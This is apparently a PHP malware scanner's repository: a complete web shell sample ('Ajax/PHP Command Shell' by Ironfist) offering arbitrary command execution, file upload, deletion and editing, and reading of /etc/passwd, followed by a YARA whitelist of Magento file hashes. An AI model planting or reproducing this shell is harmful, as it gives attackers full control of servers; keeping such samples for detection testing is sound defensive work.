751 | 752 | 753 | 754 | 755 | 756 | 757 | -------------------------------------------------------------------------------- /data/samples/classic/ajaxshell.php: -------------------------------------------------------------------------------- 1 | 'ClearScreen()', 11 | 'Clear History' => 'ClearHistory()', 12 | 'Can I function?' => "runcommand('canirun','GET')", 13 | 'Get server info' => "runcommand('showinfo','GET')", 14 | 'Read /etc/passwd' => "runcommand('etcpasswdfile','GET')", 15 | 'Open ports' => "runcommand('netstat -an | grep -i listen','GET')", 16 | 'Running processes' => "runcommand('ps -aux','GET')", 17 | 'Readme' => "runcommand('shellhelp','GET')" 18 | 19 | ); 20 | $thisfile = basename(__FILE__); 21 | 22 | $style = ''; 67 | $sess = __FILE__.$password; 68 | if(isset($_POST['p4ssw0rD'])) 69 | { 70 | if($_POST['p4ssw0rD'] == $password) 71 | { 72 | $_SESSION[$sess] = $_POST['p4ssw0rD']; 73 | } 74 | else 75 | { 76 | die("Wrong password"); 77 | } 78 | 79 | } 80 | if($_SESSION[$sess] == $password) 81 | { 82 | if(isset($_SESSION['workdir'])) 83 | { 84 | if(file_exists($_SESSION['workdir']) && is_dir($_SESSION['workdir'])) 85 | { 86 | chdir($_SESSION['workdir']); 87 | } 88 | } 89 | 90 | if(isset($_FILES['uploadedfile']['name'])) 91 | { 92 | $target_path = "./"; 93 | $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 94 | if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 95 | 96 | } 97 | } 98 | 99 | if(isset($_GET['runcmd'])) 100 | { 101 | 102 | $cmd = $_GET['runcmd']; 103 | 104 | print "".get_current_user()."~# ". htmlspecialchars($cmd)."
"; 105 | 106 | if($cmd == "") 107 | { 108 | print "Empty Command..type \"shellhelp\" for some ehh...help"; 109 | } 110 | 111 | elseif($cmd == "upload") 112 | { 113 | print '
Uploading to: '.realpath("."); 114 | if(is_writable(realpath("."))) 115 | { 116 | print "
I can write to this directory"; 117 | } 118 | else 119 | { 120 | print "
I can't write to this directory, please choose another one."; 121 | } 122 | 123 | } 124 | elseif((ereg("changeworkdir (.*)",$cmd,$file)) || (ereg("cd (.*)",$cmd,$file))) 125 | { 126 | if(file_exists($file[1]) && is_dir($file[1])) 127 | { 128 | chdir($file[1]); 129 | $_SESSION['workdir'] = $file[1]; 130 | print "Current directory changed to ".$file[1]; 131 | } 132 | else 133 | { 134 | print "Directory not found"; 135 | } 136 | } 137 | 138 | elseif(strtolower($cmd) == "shellhelp") 139 | { 140 | print 'Ajax/PHP Command Shell 141 | © By Ironfist 142 | 143 | The shell can be used by anyone to command any server, the main purpose was 144 | to create a shell that feels as dynamic as possible, is expandable and easy 145 | to understand. 146 | 147 | If one of the command execution functions work, the shell will function fine. 148 | Try the "canirun" command to check this. 149 | 150 | Any (not custom) command is a UNIX command, like ls, cat, rm ... If you\'re 151 | not used to these commands, google a little. 152 | 153 | Custom Functions 154 | If you want to add your own custom command in the Quick Commands list, check 155 | out the code. The $function array contains \'func name\' => \'javascript function\'. 156 | Take a look at the built-in functions for examples. 157 | 158 | I know this readme isn\'t providing too much information, but hell, does this shell 159 | even require one :P 160 | 161 | - Iron 162 | '; 163 | 164 | } 165 | elseif(ereg("editfile (.*)",$cmd,$file)) 166 | { 167 | if(file_exists($file[1]) && !is_dir($file[1])) 168 | { 169 | print "

"; 176 | } 177 | else 178 | { 179 | print "File not found."; 180 | } 181 | } 182 | elseif(ereg("deletefile (.*)",$cmd,$file)) 183 | { 184 | if(is_dir($file[1])) 185 | { 186 | if(rmdir($file[1])) 187 | { 188 | print "Directory succesfully deleted."; 189 | } 190 | else 191 | { 192 | print "Couldn't delete directory!"; 193 | } 194 | } 195 | else 196 | { 197 | if(unlink($file[1])) 198 | { 199 | print "File succesfully deleted."; 200 | } 201 | else 202 | { 203 | print "Couldn't delete file!"; 204 | } 205 | } 206 | } 207 | elseif(strtolower($cmd) == "canirun") 208 | { 209 | print "If any of these functions is Enabled, the shell will function like it should.
"; 210 | if(function_exists(passthru)) 211 | { 212 | print "Passthru: Enabled
"; 213 | } 214 | else 215 | { 216 | print "Passthru: Disabled
"; 217 | } 218 | 219 | if(function_exists(exec)) 220 | { 221 | print "Exec: Enabled
"; 222 | } 223 | else 224 | { 225 | print "Exec: Disabled
"; 226 | } 227 | 228 | if(function_exists(system)) 229 | { 230 | print "System: Enabled
"; 231 | } 232 | else 233 | { 234 | print "System: Disabled
"; 235 | } 236 | if(function_exists(shell_exec)) 237 | { 238 | print "Shell_exec: Enabled
"; 239 | } 240 | else 241 | { 242 | print "Shell_exec: Disabled
"; 243 | } 244 | print "
Safe mode will prevent some stuff, maybe command execution, if you're looking for a
reason why the commands aren't executed, this is probally it.
"; 245 | if( ini_get('safe_mode') ){ 246 | print "Safe Mode: Enabled"; 247 | } 248 | else 249 | { 250 | print "Safe Mode: Disabled"; 251 | } 252 | print "

Open_basedir will block access to some files you shouldn't access.
"; 253 | if( ini_get('open_basedir') ){ 254 | print "Open_basedir: Enabled"; 255 | } 256 | else 257 | { 258 | print "Open_basedir: Disabled"; 259 | } 260 | } 261 | //About the shell 262 | elseif(ereg("listdir (.*)",$cmd,$directory)) 263 | { 264 | 265 | if(!file_exists($directory[1])) 266 | { 267 | die("Directory not found"); 268 | } 269 | //Some variables 270 | chdir($directory[1]); 271 | $i = 0; $f = 0; 272 | $dirs = ""; 273 | $filez = ""; 274 | 275 | if(!ereg("/$",$directory[1])) //Does it end with a slash? 276 | { 277 | $directory[1] .= "/"; //If not, add one 278 | } 279 | print "Listing directory: ".$directory[1]."
"; 280 | print ""; 281 | 282 | if ($handle = opendir($directory[1])) { 283 | while (false !== ($file = readdir($handle))) { 284 | if(is_dir($file)) 285 | { 286 | $dirs[$i] = $file; 287 | $i++; 288 | } 289 | else 290 | { 291 | $filez[$f] = $file; 292 | $f++; 293 | } 294 | 295 | } 296 | print "
DirectoriesFiles
"; 297 | 298 | foreach($dirs as $directory) 299 | { 300 | print "[D][W]".$directory."
"; 301 | } 302 | 303 | print "
"; 304 | 305 | foreach($filez as $file) 306 | { 307 | print "[D]".$file."
"; 308 | } 309 | 310 | print "
"; 311 | } 312 | } 313 | elseif(strtolower($cmd) == "about") 314 | { 315 | print "Ajax Command Shell by Ironfist.
Version $version"; 316 | } 317 | //Show info 318 | elseif(strtolower($cmd) == "showinfo") 319 | { 320 | if(function_exists(disk_free_space)) 321 | { 322 | $free = disk_free_space("/") / 1000000; 323 | } 324 | else 325 | { 326 | $free = "N/A"; 327 | } 328 | if(function_exists(disk_total_space)) 329 | { 330 | $total = trim(disk_total_space("/") / 1000000); 331 | } 332 | else 333 | { 334 | $total = "N/A"; 335 | } 336 | $path = realpath ("."); 337 | 338 | print "Free: $free / $total MB
Current path: $path
Uname -a Output:
"; 339 | 340 | if(function_exists(passthru)) 341 | { 342 | passthru("uname -a"); 343 | } 344 | else 345 | { 346 | print "Passthru is disabled :("; 347 | } 348 | } 349 | //Read /etc/passwd 350 | elseif(strtolower($cmd) == "etcpasswdfile") 351 | { 352 | 353 | $pw = file('/etc/passwd/'); 354 | foreach($pw as $line) 355 | { 356 | print $line; 357 | } 358 | 359 | 360 | } 361 | //Execute any other command 362 | else 363 | { 364 | 365 | if(function_exists(passthru)) 366 | { 367 | passthru($cmd); 368 | } 369 | else 370 | { 371 | if(function_exists(exec)) 372 | { 373 | exec("ls -la",$result); 374 | foreach($result as $output) 375 | { 376 | print $output."
"; 377 | } 378 | } 379 | else 380 | { 381 | if(function_exists(system)) 382 | { 383 | system($cmd); 384 | } 385 | else 386 | { 387 | if(function_exists(shell_exec)) 388 | { 389 | print shell_exec($cmd); 390 | } 391 | else 392 | { 393 | print "Sorry, none of the command functions works."; 394 | } 395 | } 396 | } 397 | } 398 | } 399 | } 400 | 401 | elseif(isset($_GET['savefile']) && !empty($_POST['filetosave']) && !empty($_POST['filecontent'])) 402 | { 403 | $file = $_POST['filetosave']; 404 | if(!is_writable($file)) 405 | { 406 | if(!chmod($file, 0777)) 407 | { 408 | die("Nope, can't chmod nor save :("); //In fact, nobody ever reads this message ^_^ 409 | } 410 | } 411 | 412 | $fh = fopen($file, 'w'); 413 | $dt = $_POST['filecontent']; 414 | fwrite($fh, $dt); 415 | fclose($fh); 416 | } 417 | else 418 | { 419 | ?> 420 | 421 | 422 | Command Shell ~ <?php print getenv("HTTP_HOST"); ?> 423 | 424 | 428 | 429 | 430 | 577 | 578 | 579 | 580 | 619 | 641 |
581 | 582 |

583 |
Quick Commands
584 | 585 |
586 | $execute) 588 | { 589 | print ' 
'; 590 | } 591 | ?> 592 | 593 |
594 | 595 | 596 |
597 |
Command history
598 |
599 |
600 |
About
601 |
602 |
603 | Ajax/PHP Command Shell
by Ironfist 604 |
605 | Version 606 | 607 |
608 |
609 | 610 |
Thanks to everyone @ 611 | SharePlaza 612 |
613 | milw0rm 614 |
615 | and special greetings to everyone in rootshell 616 |
617 | 618 |
620 | 628 | 629 | 632 | 639 |
621 | [Execute command] 622 | [Upload file] 623 | [Change directory] 624 | [Filebrowser] 625 | [Create File] 626 | 627 |
630 | 631 |
633 |
634 |    
635 | Command:
636 |
637 |
638 |
640 |
642 | 643 | 644 | 648 |
649 |
You are not logged in, please login.
Password: 650 |
"; 651 | } 652 | ?> -------------------------------------------------------------------------------- /data/whitelists/magento1ce.yar: -------------------------------------------------------------------------------- 1 | private rule Magento1Ce : ECommerce 2 | { 3 | condition: 4 | /* Magento CE 1.1.1 */ 5 | hash.sha1(0, filesize) == "743c76e95b3849137c6b5552b568fa3c780c46f6" or // downloader/Maged/Pear.php 6 | hash.sha1(0, filesize) == "382cace9be19b080426456e4c984730c8ffbebf3" or // downloader/pearlib/php/System.php 7 | hash.sha1(0, filesize) == "7e0bab1294ba48689824a21e065d9643695e9f3c" or // downloader/pearlib/php/pearmage.php 8 | hash.sha1(0, filesize) == "f14a60868f4a51ee998e5e53de8bcffeecfaa56e" or // downloader/pearlib/php/pearcmd.php 9 | hash.sha1(0, filesize) == "174d2e99fbd72d9c11021e4650f2295fdf638083" or // downloader/pearlib/php/PEAR.php 10 | hash.sha1(0, filesize) == "f70bdefded327939aaa420b317e3bc15907cec3b" or // downloader/pearlib/php/PEAR/Registry.php 11 | hash.sha1(0, filesize) == "33c0a85ca6fa3a068656c404d9fcae90d687a399" or // downloader/pearlib/php/PEAR/Config.php 12 | hash.sha1(0, filesize) == "1c9b78e26352d32eaeb913579fb7789c2c9f567b" or // downloader/pearlib/php/PEAR/DependencyDB.php 13 | hash.sha1(0, filesize) == "f8bd96af3ec71ba5c4134d363cc50a209b9aef75" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 14 | hash.sha1(0, filesize) == "64bb826dd3bebbc228731e7997e157678acae8a9" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 15 | hash.sha1(0, filesize) == "4a0efdf2ad68ae8f602b53b82451171e65f82c09" or // app/code/core/Mage/Core/Model/Translate.php 16 | hash.sha1(0, filesize) == "d81f736df877f9126e4b55d1576e6f4fc932187e" or // app/code/core/Mage/Core/Model/Layout.php 17 | hash.sha1(0, filesize) == "bd99da4961c6fdd32b613a0038f6795d6810258f" or // app/code/core/Mage/Core/Model/Convert/Profile.php 18 | hash.sha1(0, filesize) == "1f3f1c184b3d1bdfe5243305320ce65a240f0485" or // 
app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 19 | hash.sha1(0, filesize) == "b6c0294bc06354096936ba415a973e7e7b596c1a" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 20 | hash.sha1(0, filesize) == "8a1291211cbdcc17b26fd41b60a67eb0c35d25be" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 21 | hash.sha1(0, filesize) == "fcfdc0cb032200b95bdf177c0b50041e02c49d23" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 22 | hash.sha1(0, filesize) == "888454d2cea4ee1e53c60eee13b0454397d39c22" or // app/code/core/Mage/Dataflow/Model/Profile.php 23 | hash.sha1(0, filesize) == "a0d304e026db4b836f3fbc71a6e77bc470f1b07c" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 24 | hash.sha1(0, filesize) == "c574ef276266161c851696615ae77b9f7a1a1b43" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 25 | hash.sha1(0, filesize) == "aeb3f5e823029465cbb7c3edbf84180bc0889952" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 26 | hash.sha1(0, filesize) == "5e3470d274cd5b2e279ac978ded8f220772df0be" or // app/code/core/Zend/Cache/Backend/File.php 27 | hash.sha1(0, filesize) == "0ccb0666a924e7c5167256e1b0751a0427ab2098" or // lib/LinLibertineFont/LinLibertineC_Re-2.8.0.ttf 28 | hash.sha1(0, filesize) == "b50d4664c1a7789fe6826a16a4970d65e51dc3fa" or // lib/Varien/Pear.php 29 | hash.sha1(0, filesize) == "67386af90cbdb52a40ae5e458e2c7ac4688eddd2" or // lib/Varien/Data/Form/Element/Date.php 30 | hash.sha1(0, filesize) == "29012eb0dfee3e1b32ec76d433357b8c545540e7" or // lib/Varien/Data/Form/Element/Gallery.php 31 | hash.sha1(0, filesize) == "c4a0b1abe86508dde3ffaaf1731796586d3b2333" or // lib/Varien/Data/Form/Element/Editor.php 32 | hash.sha1(0, filesize) == "0367960b396fbc2db3654ecf6dac52e89788d117" or // lib/Varien/Data/Form/Element/Multiline.php 33 | hash.sha1(0, filesize) == "b40603ca11ce90532da0a853d45120e00e6de413" or // lib/Varien/Db/test.php 34 
| hash.sha1(0, filesize) == "aae982ba3996eda190fa0c734f15f07253c1e51e" or // lib/Varien/Db/Tree.php 35 | hash.sha1(0, filesize) == "f9b9451b6c78160d889ecf1ba48020a6c17872b2" or // lib/Zend/View/Helper/HeadScript.php 36 | hash.sha1(0, filesize) == "7477aa9fe2d3f24e7d32a53e3588dda01ee5fe26" or // lib/Zend/Locale/Format.php 37 | hash.sha1(0, filesize) == "8b92c7a7efc45174190dcb65b07beddf9e4d7153" or // lib/Zend/Locale/Data.php 38 | hash.sha1(0, filesize) == "4ce8e354e898f9c8986dbc9326a672b3312f6c69" or // lib/Zend/Date/DateObject.php 39 | hash.sha1(0, filesize) == "7d0c4da4d1eade1f6c6633ade14121ab10c56d9f" or // lib/Zend/Cache/Backend/File.php 40 | 41 | /* Magento CE 1.1.2 */ 42 | hash.sha1(0, filesize) == "05943fb7d0b4d698f6e4369e601254efb3fb00ef" or // lib/LinLibertineFont/LinLibertine_Bd-2.8.1.ttf 43 | 44 | /* Magento CE 1.1.3 */ 45 | 46 | /* Magento CE 1.1.4 */ 47 | 48 | /* Magento CE 1.1.5 */ 49 | hash.sha1(0, filesize) == "a08c529465cbfdd88eff785e55487419a35041e5" or // downloader/Maged/Pear.php 50 | hash.sha1(0, filesize) == "7da9ee530dd22d47e4adc7f9cfe4bd5f31f8d426" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 51 | hash.sha1(0, filesize) == "c0286fe2fd26330143cfc53b984cf543ea4284b9" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 52 | hash.sha1(0, filesize) == "ee55c97ab67e3c220d2138dcb4b7f795ed424e57" or // app/code/core/Mage/Core/Model/Translate.php 53 | hash.sha1(0, filesize) == "56750037b5fb0beba3541a6405d46684235619ca" or // app/code/core/Mage/Core/Model/Layout.php 54 | hash.sha1(0, filesize) == "35d6542180b2d89477d2923151e755e2c438c06c" or // app/code/core/Mage/Core/Model/Convert/Profile.php 55 | hash.sha1(0, filesize) == "cf2450914ca13e60d30dacd243c9e4962785ff0b" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 56 | hash.sha1(0, filesize) == "e6c2bd60400cae9b30095328ec9d378af98d8bd9" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 57 | 
hash.sha1(0, filesize) == "450c9c35b69b5cdbfd82378247f2bd5e06c102ee" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 58 | hash.sha1(0, filesize) == "055bc24efb7da2740bf3e50e25fa91ac193b4f4c" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 59 | hash.sha1(0, filesize) == "8c3922d6b86d2d783cb68775a3eb1ca91bfa6ffb" or // app/code/core/Mage/Dataflow/Model/Profile.php 60 | hash.sha1(0, filesize) == "b53329d05fefd512edc86f9a11c50e1f10b7543f" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 61 | hash.sha1(0, filesize) == "f87abb261a2dcc9b163314e47939fb89859574d1" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 62 | hash.sha1(0, filesize) == "a84f4c6b83a61dab0db37730b0f938b4e8473330" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 63 | hash.sha1(0, filesize) == "cbb147789c7072f587890b8332dad9bed063bb2d" or // lib/Varien/Data/Form/Element/Date.php 64 | hash.sha1(0, filesize) == "0159b4c43eae084bedbadc494d1298e3e181f4b0" or // lib/Varien/Data/Form/Element/Gallery.php 65 | hash.sha1(0, filesize) == "44c3494ba9233407b0a5476d6cf9dc1eabd0f28a" or // lib/Varien/Data/Form/Element/Editor.php 66 | hash.sha1(0, filesize) == "6f259b077f88ad086b64a48a6fa0d0b40bd2a899" or // lib/Varien/Data/Form/Element/Multiline.php 67 | hash.sha1(0, filesize) == "1061b92949e6c336246b5020d39be60ece155d63" or // lib/Varien/Db/Tree.php 68 | 69 | /* Magento CE 1.1.6 */ 70 | 71 | /* Magento CE 1.1.7 */ 72 | hash.sha1(0, filesize) == "df23a41ed1e7996020489270e90a4aa2aa2be89d" or // downloader/Maged/Pear.php 73 | hash.sha1(0, filesize) == "ede3de4e1f73a6d047e7086d8317e06a6bf3be50" or // app/code/core/Mage/Core/Model/Layout.php 74 | hash.sha1(0, filesize) == "9cf1ea4c8cf4bc5e0b3a73a918d87c7663472c83" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 75 | hash.sha1(0, filesize) == "d7e5697b32e415f4db5f3fcc1d329577732a71c6" or // 
lib/Varien/Data/Form/Element/Image.php 76 | 77 | /* Magento CE 1.1.8 */ 78 | 79 | /* Magento CE 1.2.0 */ 80 | hash.sha1(0, filesize) == "d6ebc6b2915ee40734da5ca750ed522cb85dd1a7" or // app/code/core/Mage/Core/Model/Translate.php 81 | hash.sha1(0, filesize) == "277fdd2ebdaef4ed69caf17f5c416f1fc84a236c" or // app/code/core/Mage/Core/Model/Translate/Inline.php 82 | hash.sha1(0, filesize) == "37e38312a8883e404e1e810187cb42bb4eee3fa4" or // app/code/core/Mage/Dataflow/Model/Profile.php 83 | hash.sha1(0, filesize) == "2760412ac71dc87364adc8ddd74c10913e9bd9e1" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 84 | hash.sha1(0, filesize) == "98357e8621dcd97741535e97ce2d8d9a72853985" or // lib/Zend/View/Helper/HeadScript.php 85 | hash.sha1(0, filesize) == "286cf3a6569addf0ae4caba845cd94b9c0378158" or // lib/Zend/Locale/Format.php 86 | hash.sha1(0, filesize) == "f504a4747192d5428651979295780563491c3c3b" or // lib/Zend/Locale/Data.php 87 | hash.sha1(0, filesize) == "a16d202e41bae23330e0c110d5c211bb57ec0d87" or // lib/Zend/Service/ReCaptcha/MailHide.php 88 | hash.sha1(0, filesize) == "b606b94b19adba03b88b50567f59aae56ef2f91b" or // lib/Zend/Session/Exception.php 89 | hash.sha1(0, filesize) == "c22e09c85f4be958350c7f08a2570d3c3c1d4650" or // lib/Zend/Date/DateObject.php 90 | hash.sha1(0, filesize) == "4cf814ec9721da591eb5ca2861eddb80cecc90d5" or // lib/Zend/Cache/Backend/File.php 91 | 92 | /* Magento CE 1.2.0.1 */ 93 | 94 | /* Magento CE 1.2.0.2 */ 95 | 96 | /* Magento CE 1.2.0.3 */ 97 | hash.sha1(0, filesize) == "125119cd8cb47404d310f10216749983bba7591f" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 98 | 99 | /* Magento CE 1.2.1 */ 100 | hash.sha1(0, filesize) == "695c700689f7cfdb21ac04a91bed0d39088a381b" or // app/code/core/Mage/Core/Model/Translate.php 101 | 102 | /* Magento CE 1.2.1.1 */ 103 | 104 | /* Magento CE 1.2.1.2 */ 105 | 106 | /* Magento CE 1.3.0 */ 107 | hash.sha1(0, filesize) == 
"f4e7a4fd12b9975e64ee9e11791cce63c30aedf7" or // app/code/core/Mage/Core/Model/Translate.php 108 | hash.sha1(0, filesize) == "ffdc0c6eb436576f8b68fe40279301ce133b562c" or // app/code/core/Mage/Core/Model/Layout.php 109 | hash.sha1(0, filesize) == "5fea618cc39851ff46dea7f25e29fb3b3e0498cf" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 110 | hash.sha1(0, filesize) == "62bff1028824ec8ac0b46cbf492a5fbebe400b08" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 111 | 112 | /* Magento CE 1.3.1 */ 113 | hash.sha1(0, filesize) == "b3c2e7755a0d2b5c75f918397a5ed7f6feea5577" or // lib/PEAR/SOAP/Transport.php 114 | hash.sha1(0, filesize) == "4b66586bfa75b202e9227ac784a8ff9629005201" or // lib/PEAR/SOAP/Transport/HTTP.php 115 | 116 | /* Magento CE 1.3.1.1 */ 117 | 118 | /* Magento CE 1.3.2 */ 119 | hash.sha1(0, filesize) == "d7d4f3d1931ee90f7d820d1a754dbeb5e969adc0" or // downloader/pearlib/php/System.php 120 | hash.sha1(0, filesize) == "7fc1f9a57e67ceb0c1208e15374ce3799bfeccf2" or // app/code/core/Mage/Core/Model/Translate.php 121 | hash.sha1(0, filesize) == "c3d1caf978ce50359052d09e1d017814bab8bce2" or // app/code/core/Mage/Core/Model/Layout.php 122 | hash.sha1(0, filesize) == "893280bc8bcf75b65e2a59b60df8afcabfb7e4e5" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 123 | hash.sha1(0, filesize) == "c09844900dade96dea89ce6a8b2a7454c3a5c331" or // app/code/core/Zend/Cache/Backend/File.php 124 | hash.sha1(0, filesize) == "94e01fee6209e3bbd9034af7c83a630d6cc1e664" or // lib/Varien/Autoload.php 125 | 126 | /* Magento CE 1.3.2.1 */ 127 | 128 | /* Magento CE 1.3.2.2 */ 129 | hash.sha1(0, filesize) == "082fd7a80bef30aca4e8d8ae4b1a9f9f6ae78dab" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 130 | hash.sha1(0, filesize) == "7d83812c0d978f2b4a4703e211476b855f20b5e9" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 131 | hash.sha1(0, filesize) == 
"958de36312c048d2c00aa78c5ea46a8ef48b3a32" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 132 | hash.sha1(0, filesize) == "7395a693295b54c4299f3393a479302b57a0d31a" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 133 | hash.sha1(0, filesize) == "d9bf44dbad9dafa0ea5976628eec3c15bf82b16d" or // lib/Varien/Autoload.php 134 | 135 | /* Magento CE 1.3.2.3 */ 136 | 137 | /* Magento CE 1.3.2.4 */ 138 | 139 | /* Magento CE 1.3.3.0 */ 140 | 141 | /* Magento CE 1.4.0.0 */ 142 | hash.sha1(0, filesize) == "7f2002909dd18f949f4ce314e4eb88cfd7cfe995" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 143 | hash.sha1(0, filesize) == "2addd217a3550aee35337810ed0e1827cfe0b759" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 144 | hash.sha1(0, filesize) == "b1a0974f819869bf60687f8138037c1533c005d4" or // app/code/core/Mage/Core/Model/Translate.php 145 | hash.sha1(0, filesize) == "e7b2cbeb82280d159a14f56004a9bd57a27c69b5" or // app/code/core/Mage/Core/Model/Layout.php 146 | hash.sha1(0, filesize) == "74f315376c667e8663667b43ae01d5f4438a1cae" or // app/code/core/Mage/Core/Model/Convert/Profile.php 147 | hash.sha1(0, filesize) == "55070101ed51ba9b710a133d443bf06690cc0a3a" or // app/code/core/Mage/Core/Model/Translate/Inline.php 148 | hash.sha1(0, filesize) == "e47990d40d3dc59cb50fbb8880a8cf7d4f78a291" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 149 | hash.sha1(0, filesize) == "6108e7ed98fed4f1056be8cecc85b3199be13a4d" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 150 | hash.sha1(0, filesize) == "75418233be7d2e5641ccd436b71d9fe7421c10bd" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 151 | hash.sha1(0, filesize) == "0ee9b3a1a41e2d000dbfea245fc048b0996ff1f5" or // app/code/core/Mage/Catalog/Block/Product/View/Options/Type/Select.php 152 | hash.sha1(0, filesize) == "5671193e8b5f0d6099382476b110a199cbd648d9" or // 
app/code/core/Mage/Dataflow/Model/Profile.php 153 | hash.sha1(0, filesize) == "8c4b2e07d3f643e9a371772a7cf7b0ead9462270" or // app/code/core/Mage/Adminhtml/Model/Url.php 154 | hash.sha1(0, filesize) == "95d8cc1b6a755466ed30d4a306a36d75ef1874f1" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Fieldset.php 155 | hash.sha1(0, filesize) == "930af3e546e73fdd7ac82d53a8ccf618ce13316b" or // app/code/core/Mage/Adminhtml/Block/System/Config/Form/Field.php 156 | hash.sha1(0, filesize) == "40cf1134b4ff2088bab26b0d29902f4efe875456" or // app/code/core/Mage/Adminhtml/Block/Customer/Edit/Renderer/Region.php 157 | hash.sha1(0, filesize) == "a9fbc4360285f686040a1fb42e19ae121ef37e1b" or // app/code/core/Mage/Adminhtml/Block/Catalog/Product/Edit/Tab/Options/Option.php 158 | hash.sha1(0, filesize) == "cefa8a549ad1ddc4cac45725b83f7a7517041203" or // app/design/frontend/default/iphone/template/customer/widget/dob.phtml 159 | hash.sha1(0, filesize) == "f890c4755c69dd318efde4620962b5edd816bc9e" or // app/design/frontend/base/default/template/customer/widget/dob.phtml 160 | hash.sha1(0, filesize) == "3df4377b9682ef76344b5eacdc43acf6a6484e7a" or // lib/Varien/Autoload.php 161 | hash.sha1(0, filesize) == "aebbeca270ebba508ac3a9e1c178a359006e8dad" or // lib/Varien/Data/Form/Element/Gallery.php 162 | hash.sha1(0, filesize) == "16615eee0a74cde38b34767a777ce10dbe0dd7c9" or // lib/Varien/Data/Form/Element/Editor.php 163 | hash.sha1(0, filesize) == "7832f3a823fe08c5494f5c42a964f49790fb86f2" or // lib/Varien/Data/Form/Element/Image.php 164 | hash.sha1(0, filesize) == "c0c772d84c95e4737c4ac4849be4129e3e17447f" or // lib/Varien/File/Uploader.php 165 | hash.sha1(0, filesize) == "b8734fb02aa55fb19bacc16e848b88681b29f493" or // lib/Zend/View/Helper/HeadScript.php 166 | hash.sha1(0, filesize) == "8a7d49626f09ce662f3a4b2d7c5c2b63e3a0b849" or // lib/Zend/Locale/Format.php 167 | hash.sha1(0, filesize) == "c3363ec292bb5cb07ad938853030c127d2b6ef97" or // lib/Zend/Locale/Data.php 168 | 
hash.sha1(0, filesize) == "b5499e5b6ce9bf40b7428cb5d8ba75af73cf36f1" or // lib/Zend/Soap/Client.php 169 | hash.sha1(0, filesize) == "063158d99db2cff6927ddb42d3b342c383f086bd" or // lib/Zend/Service/ReCaptcha/MailHide.php 170 | hash.sha1(0, filesize) == "d97634b7981e003503949f09fa5296658bf29bf4" or // lib/Zend/Amf/Server.php 171 | hash.sha1(0, filesize) == "ba5c8b927ccdfff1139ee6274d5cf6c9954bd706" or // lib/Zend/Session/Exception.php 172 | hash.sha1(0, filesize) == "b3904d9bd5b510249b6607c13adec6aff159b3a4" or // lib/Zend/Date/DateObject.php 173 | 174 | /* Magento CE 1.4.0.1 */ 175 | 176 | /* Magento CE 1.4.1.0 */ 177 | hash.sha1(0, filesize) == "c26d82fca7498e54640b615fabef8c4d45c6655d" or // app/code/core/Mage/GoogleCheckout/Block/Adminhtml/Shipping/Merchant.php 178 | hash.sha1(0, filesize) == "72863ffa4faa9bb2dd735611afe1310c58aff7f4" or // app/code/core/Mage/CatalogRule/sql/catalogrule_setup/mysql4-upgrade-0.7.1-0.7.2.php 179 | hash.sha1(0, filesize) == "21ba19ce0f50a4084301e8689f2f7cda2f971204" or // app/code/core/Mage/Core/Model/Translate.php 180 | hash.sha1(0, filesize) == "fcd994fe6f9c177e32d64f2dbc11344306da73d8" or // app/code/core/Mage/Core/Model/Layout.php 181 | hash.sha1(0, filesize) == "2164a2692f6a7d4a0fe1589b9e2822f3b51a0363" or // app/code/core/Mage/Core/Model/Convert/Profile.php 182 | hash.sha1(0, filesize) == "b8435034f33e6261ae700052bf6fa9d8b0f821bd" or // app/code/core/Mage/Core/Model/Translate/Inline.php 183 | hash.sha1(0, filesize) == "a59a390c12706e4aa74e1f91868c8773cfbbbd81" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Category.php 184 | hash.sha1(0, filesize) == "640c7e18fc10ccb14b9b0fd2ff336f3894928cfb" or // app/code/core/Mage/Sitemap/Model/Mysql4/Catalog/Product.php 185 | hash.sha1(0, filesize) == "91460799f6a9c6385e9878fd0a79624b8112d079" or // app/code/core/Mage/Directory/Model/Mysql4/Currency.php 186 | hash.sha1(0, filesize) == 